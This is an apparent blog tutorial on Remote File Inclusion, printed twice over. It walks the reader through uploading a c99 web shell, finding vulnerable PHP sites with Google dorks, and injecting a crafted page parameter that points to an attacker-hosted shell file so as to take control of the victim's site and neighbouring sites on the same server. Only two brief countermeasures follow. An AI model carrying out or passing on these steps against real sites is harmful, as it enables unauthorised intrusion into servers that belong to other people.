Before starting this tutorial, I would like to tell you about a piece of code called as shell. There are many shells available . Lets consider a shell known as c99 shell. First download it from here.
Now signup for a account on any free web hosting site . Say 110mb.com. Now sign into your account,go to Filemanager, upload some files and then upload c99 shell here. Now just log out and visit the URL of shell you uploaded.
and you would find that you can manage all your directories and files without logging in your account,that is without entering your password anywhere.
Both images are showing the filemanager, In Ist I am accesing by signing into my account and 2nd just by accessing shell without logging into.
I just wanted to show you that Imagine if anybody somehow upload this kind of shell on your server, how deadly it can be. Here comes the concept of Remote File Inclusion into picture.
Note:Your account might be suspended after uploading such shells.
What is Remote File Inclusion ?
As clear from the name, Remote File inclusion means 'including a remote file' . RFI is a vulneribility found in websites that allow attackers to include a remote file on the webserver. This may lead to remote code execution and complete compromise of system.
How to perform attack ?
Step 1. Upload a shell in text format on your web hosting site. That is just copy the code of shell and save it as text file and upload it. Note down the complete path of your shell.
Step 2. Search for the vulnerable site using google dorks. like
inurl:index.php?id=
inurl:index.php?page=
You can use automated tools for the same.
Step3. Lets say you got any site like
http://www.victim.com/index.php?page=anything
Replace this URL by http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?
Your shell might have uploaded on server if the victim's site is vulnerable. Now you can do any thing with victim's site or may be even with other sites running on same webserver by simply accessing your shell.
Possible Countermeasures :
1. Strongly validate the user's input.
2. Disable allow_url_fopen and allow_url_include in php.ini .
Now signup for a account on any free web hosting site . Say 110mb.com. Now sign into your account,go to Filemanager, upload some files and then upload c99 shell here. Now just log out and visit the URL of shell you uploaded.
http://username.110mb.com/shell.php
and you would find that you can manage all your directories and files without logging in your account,that is without entering your password anywhere.
Both images are showing the filemanager, In Ist I am accesing by signing into my account and 2nd just by accessing shell without logging into.
I just wanted to show you that Imagine if anybody somehow upload this kind of shell on your server, how deadly it can be. Here comes the concept of Remote File Inclusion into picture.
Note:Your account might be suspended after uploading such shells.
What is Remote File Inclusion ?
As clear from the name, Remote File inclusion means 'including a remote file' . RFI is a vulneribility found in websites that allow attackers to include a remote file on the webserver. This may lead to remote code execution and complete compromise of system.
How to perform attack ?
Step 1. Upload a shell in text format on your web hosting site. That is just copy the code of shell and save it as text file and upload it. Note down the complete path of your shell.
Step 2. Search for the vulnerable site using google dorks. like
inurl:index.php?id=
inurl:index.php?page=
You can use automated tools for the same.
Step3. Lets say you got any site like
http://www.victim.com/index.php?page=anything
Replace this URL by http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?
Your shell might have uploaded on server if the victim's site is vulnerable. Now you can do any thing with victim's site or may be even with other sites running on same webserver by simply accessing your shell.
Possible Countermeasures :
1. Strongly validate the user's input.
2. Disable allow_url_fopen and allow_url_include in php.ini .
0 comments:
Post a Comment